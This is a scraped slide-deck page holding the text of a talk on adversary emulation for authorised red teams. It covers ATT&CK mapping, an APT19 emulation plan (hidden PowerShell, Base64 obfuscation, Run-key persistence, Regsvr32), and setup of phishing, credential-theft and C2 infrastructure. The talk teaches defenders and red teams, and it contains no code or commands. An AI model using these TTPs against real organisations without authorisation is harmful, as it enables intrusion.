Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 Matrix
Jorge Orchilles
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29
Jorge Orchilles
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Jorge Orchilles
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Jorge Orchilles
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control Frameworks
Jorge Orchilles
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 Apps
Jorge Orchilles
 

More from Jorge Orchilles (16)

SCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim SchulzSCYTHE Purple Team Workshop with Tim Schulz
SCYTHE Purple Team Workshop with Tim Schulz
 
KringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive SecurityKringleCon 3 Providing Value in Offensive Security
KringleCon 3 Providing Value in Offensive Security
 
C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020C2 Matrix Anniversary - Blackhat EU 2020
C2 Matrix Anniversary - Blackhat EU 2020
 
Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020Purple Team Exercise Workshop December 2020
Purple Team Exercise Workshop December 2020
 
Evolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootConEvolution of Offensive Assessments - RootCon
Evolution of Offensive Assessments - RootCon
 
Blackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 MatrixBlackhat 2020 Arsenal - C2 Matrix
Blackhat 2020 Arsenal - C2 Matrix
 
Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29Cuddling the Cozy Bear Emulating APT29
Cuddling the Cozy Bear Emulating APT29
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin FestAdversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
 
C2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control FrameworksC2 Matrix A Comparison of Command and Control Frameworks
C2 Matrix A Comparison of Command and Control Frameworks
 
Windows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 AppsWindows Phone 8 Security and Testing WP8 Apps
Windows Phone 8 Security and Testing WP8 Apps
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?
 
BackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA PresentationBackTrack 4 R2 - SFISSA Presentation
BackTrack 4 R2 - SFISSA Presentation
 
Emerging Threats to Infrastructure
Emerging Threats to InfrastructureEmerging Threats to Infrastructure
Emerging Threats to Infrastructure
 
Windows 7 Security
Windows 7 SecurityWindows 7 Security
Windows 7 Security
 

Recently uploaded

Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
Overkill Security
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Orbitshub
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Recently uploaded (20)

Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 

Adversary Emulation - Red Team Village - Mayhem 2020

  • 2. #WHOAMILed offensive security team at large financial for past 10 years Published industry contributions include: ⑊ Founding member MITRE Engenuity Center ⑊ Co-Author GFMA Threat-led Penetration Testing & Red Team Framework ⑊ SANS Instructor and author of Red Team course: SEC564 ⑊ NSI Technologist Fellow; ISSA Fellow ⑊ Common Vulnerability Scoring System (CVSSv3.1) ⑊ Author of Windows 7 Administrators reference (Syngress) @JORGEORCHILLES
  • 3. 3 VULNERABILITY SCANNING VULNERABILITY ASSESSMENT PENETRATION TESTING RED TEAM IN PERSON PURPLE TEAM CONTINOUS PURPLE TEAM ADVERSARY EMULATION Definition: A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective like those of realistic adversary. Goal: Emulate an end-to-end attack against a target organization. Obtain a holistic view of the organization’s preparedness for a real, sophisticated attack. @JORGEORCHILLES
  • 4. 4 An end to end assessment of the entire organization ⑊ Main differentiator from penetration testing - Tests the defenders not the defenses (detection vs. prevention) - People, Process, and Technology - Not a limited scope test targeting just a particular product, infrastructure, network, application, URL, or domain ⑊ Full Cyber Kill Chain from Recon to Objective ⑊ Often blind, unannounced exercise ⑊ Determine what TTPs would work, undetected if a true attack occurred and action plan to remediate @JORGEORCHILLES
  • 5. 5 Measuring the effectiveness of People, Process, and Technology Documented metrics and timeline of entire exercise ⑊ Time and TTPs to obtain initial access ⑊ TTPs that allowed moving laterally ⑊ Identify TTPs not prevented or detected ⑊ Process and time to escalate events into an incident ⑊ Time to contain ⑊ Time to eradicate ⑊ Process to engage hunt team, coordinate communications, alert leadership and correlate all events and realize sophisticated, targeted attack @JORGEORCHILLES
  • 6. 6 ASSUMPTIONS That attack won’t work here because… “We applied all patches” “We have outbound DLP” “Our users would never open a macro” “Our applications have MFA” “Our network is segmented and only way out is through proxy” “We have firewalls, AV, and IDS” Trust but verify Can the Iranians breach us? @JORGEORCHILLES
  • 7. 7 Training and improving the Blue Team ⑊ Every Red Team Exercise will result in Blue Team getting better ⑊ As you measure the people, process, and technology you will see improvements ⑊ Lessons will be learned, and processes improved ⑊ The more you train, the more you improve @JORGEORCHILLES
  • 8. 8 FRAMEWORK & METHODOLOGIES ⑊ Cyber Kill Chain – Lockheed Martin ⑊ Unified Cyber Kill Chain – Paul Pols ⑊ ATT&CK – MITRE Regulatory ⑊ CBEST Intelligence Led Testing – Bank of England ⑊ Threat Intelligence-Based Ethical Red Teaming – TIBER-EU ⑊ Red Team: Adversarial Attack Simulation Exercises – ABS (Association of Banks of Singapore) ⑊ intelligence-led Cyber Attack Simulation Testing (iCAST) – HKMA (Hong Kong Monetary Authority) ⑊ G-7 Fundamental Elements for Threat-Led Penetration Testing (G7FE-TLPT) ⑊ A Framework for the Regulatory Use of Penetration Testing and Red Teaming in the Financial Services Industry – GFMA (Global Financial Markets Association) @JORGEORCHILLES
  • 9. INITIAL ACCESS EXECUTION PERSISTENCE PRIVILEGE ESCALATION DEFENSIVE EVASION CREDENTIAL ACCESS DISCOVERY LATERAL MOVEMENT COLLECTION COMMAND AND CONTROL EXFILTRATION IMPACT DRIVE- BY COMPROMISE APPLESCRIPT .BASH_PROFULE AND .BASHRC ACCESS TOKEN MANIPULATION ACCESS TOKEN MANIPULATION ACCOUNT MANIPULATION ACCOUNT DISCOVERY APPLESCRIPT AUDIO CAPTURE COMMONLY USED PORT AUTOMATED EXFILTRATION DATA DESTRUCTION EXPLOIT PUBLIC- FACING APPLICATION CMSTP ACCESIBILITY FEATURES ACCESIBILITY FEATURES BITS JOBS BASH HISTORY APPLICATION WINDOW DISCOVERY APPLICATION DEPLOYMENT SOFTWARE AUTOMATED COLLECTION COMMUINICTION THROUGH REMOVABLE DATA DATA COMPRESSED DATA ENCRYPTED FOR IMPACT EXTERNAL REMOTE SERVICES COMMAND-LINE INTERFACE ACCOUNT MANIPULATION APPCERT DLLS DINARY PADDING BRUTE FORCE BROWSER BOOKMARK DISCOVERY DISTRUBETED COMPONENT OBJECT MODEL CLIPBOARD DATA CONNECTION PROXY DATA ENCRYPTED DEFACEMENT HARDWARE ADDITIONS COMPILED HTML FILE APPCERT DLLS APPINIT DLLS ACCOUNT CONTROL BYPASS USER CREDENTIAL DUMPING DOMAIN TRUST DISCOVERY EXPLOITATION OF REMOTE SERVICES DATA STAGE CUSTOM COMMAND AND CONTROL PROTOCOL DATA TRANSFER SIZE LIMIT DISK CONTENT WIPE REPLICATION THROUGH REMOVABLE MEDIA CONTORL PANEL ITEMS APPINIT DLLS APPLICATION SHIMMIMG CMSTP CREDENTIALS IN FILES FILE AND DIRECTORY DISCOVERY LOGON SCRIPT DATA FROM INFORMATION REPOSITORIES CUSTOM CRYPTOGRAPHIC PROTOCOL EXFILTRATION OVER ALTERNATIVE PROTOCOL DISK STRUCTURE WIPE SPEARPHISHING ATTACHMENT DYNAMIC DATA EXCHANGE APPLICATION SHIMMING BYPASS USER ACCOUNT CONTROL CLEAR COMMAND HISTORY CREDENTIALS IN REGISTRY NETWORK SERVICE SCANNING PASS THE HASH DATA FROM LOCAL SYSTEM DATA ENCODING EXFILTRATION OVER COMMAND AND CONTROL CHANNEL ENDPOINT DENIAL OF SERVICE SPEARPHISHING LINK EXECUTION THROUGH API AUTHENTICATION PACKAGE DLL SEARCH ORDER HIJACKING CODE SIGNING EXPLOITATION FOR CREDENTIAL ACCESS NETWORK SHARE DISCOVERY PASS THE TICKET DATA FROM NETWORK SHARE DRIVE DATA OBFUSCATION EXFILTRATION OVER OTHER NETWORK MEDIUM FIRMWARE CORRUPTION MITRE has developed the ATT&CK Matrix as a central repository for adversary TTPs. It is used by both red and blue teams. It is rapidly gaining traction as a de facto standard! @JORGEORCHILLES
  • 10. FRAMEWORK Most organizations will take a hybrid approach based on the frameworks and methodologies just introduced ⑊ Threat Intelligence ⑊ Planning ⑊ Testing ⑊ Closure @JORGEORCHILLES
  • 11. T1086 – PowerShell T1068 – Exploitation for Privilege Escalation T1003 – Credential Dumping S0194 – PowerSploit S0192 – Pupy S0002 – Mimikatz S0129 – AutoIT Hash Value IP Address TACTICS | TECHNIQUES | PROCEDURES https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html @JORGEORCHILLES
  • 13. @JORGEORCHILLES Category Description Description APT19 is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. Goal and Intent Exist in the network to enumerate systems and information in order to maintain Command and Control to support future attacks. Command and Control Commonly Used Port (T1043) - TCP port 80; Standard Application Layer Protocol (T1071) - HTTP; Deobfuscate/Decode Files or Information (T1140); Data Encoding (T1132) - used Base64 to encode communications to the C2 server Initial Access Spearphishing attachment (T1193); Spearphishing link (T1192) Execution PowerShell (T1086); User Execution; Hidden Windows (T1143) - used -W Hidden to conceal PowerShell windows by setting the WindowStyle parameter to hidden; Obfuscated Files or Information (T1027) - used Base64 to obfuscate commands and the payload; DLL Side-Loading (T1073) Discovery System Owner/User Discovery (T1033); System Information Discovery (T1082) System Network Configuration Discovery (T1016) Persistence Registry Run Keys/ Start up Folder (T1060) - establishes persistence by setting the Registry key HKCUSoftwareMicrosoftWindowsCurrentVersionRun Defense Evasion Regsvr32 (T1117); Scripting (T1064) - downloaded and launched code within a SCT file to bypass application whitelisting techniques
  • 14. 14 TRUSTED AGENTS RULES OF ENGAGEMENT ATTACK INFRASTRUCTURE o Limited number of people with knowledge of the exercise o When players find out about exercise their behavior changes o Individuals whose daily roles and responsibilities put them in a position to contribute to reducing the risk of causing unintended impact to production systems and/or inaccurate senior or external escalation Establish the responsibility, relationship, and guidelines between Trusted Agents and Players o Rules for Blue Team o Carry out all activity as any other incident o Trusted Agents will report what incidents are being investigated o Do not report exercise related items to regulators o Rules for Red Team o Do not bring down any business process or operation o Communicate all actions during daily brief Red Team is responsible for setting up infrastructure to emulate TTPs o Choose and procure external hosting service providers o Purchase domain names o Generate domain certificates o Setup mail servers o Setup phishing and credential theft sites o Confirm reputation and categorization of all domain and IPs o Setup Short and Long Haul C2 infrastructure o Configure custom C2 tooling o Test external C2 communication PLANNING @JORGEORCHILLES White Team or White Cell
  • 15. 15 Matrix of command and control frameworks for Red Teamers ⑊ Google doc of most C2 frameworks: www.thec2matrix.com ⑊ Documents various capabilities of each framework ⑊ There is no right or wrong, better or worse framework ⑊ Find ideal C2 for your current objective ⑊ Wizard like UI to select which one: ask.thec2matrix.com ⑊ How-To Site for using C2s: howto.thec2matrix.com ⑊ SANS Slingshot C2 Matrix Edition @JORGEORCHILLES
  • 16. Let’s do it Live! @JORGEORCHILLES
  • 17.
  • 18.
  • 19.
  • 20. 20
  • 21. 21 VULNERABILITY SCANNING VULNERABILITY ASSESSMENT PENETRATION TESTING RED TEAM Emulate APT19 with Empire3 & Starkiller https://howto.thec2matrix.com/c2/empire#red-team-village-mayhem-demo-of-apt19 @JORGEORCHILLES
  • 22. 22 ⑊ What TTPs were prevented? Why? Document these too! ⑊ What was detected? How long did it take? - Time to contain - Time to eradicate ⑊ Where processes followed? - Process and time to escalate events into an incident - Process to engage hunt team - Process to coordinate communications & alert leadership - Process to corelate all events and realize sophisticated, targeted attack CLOSURE @JORGEORCHILLES
  • 23.
  • 24. 24
  • 25. 25
  • 26. Threat Catalog Cyber Threat Intelligence Emulation Plan C2 Server & Reports for the Business MITRE ATT&CK Production Automated Emulation Initial Access https://medium.com/@jorgeorchilles/purple-team-exercise-tools-a85187ce341 ⑊ Red Team will be asked to repeat TTPs ⑊ Don’t waste Red Team Operator time re- doing the same TTP while engineers, operations, and SOC get detection working
  • 27. Thank you! Q & A?@JorgeOrchilles @C2_Matrix https://www.thec2matrix.com/ https://www.sans.org/sec564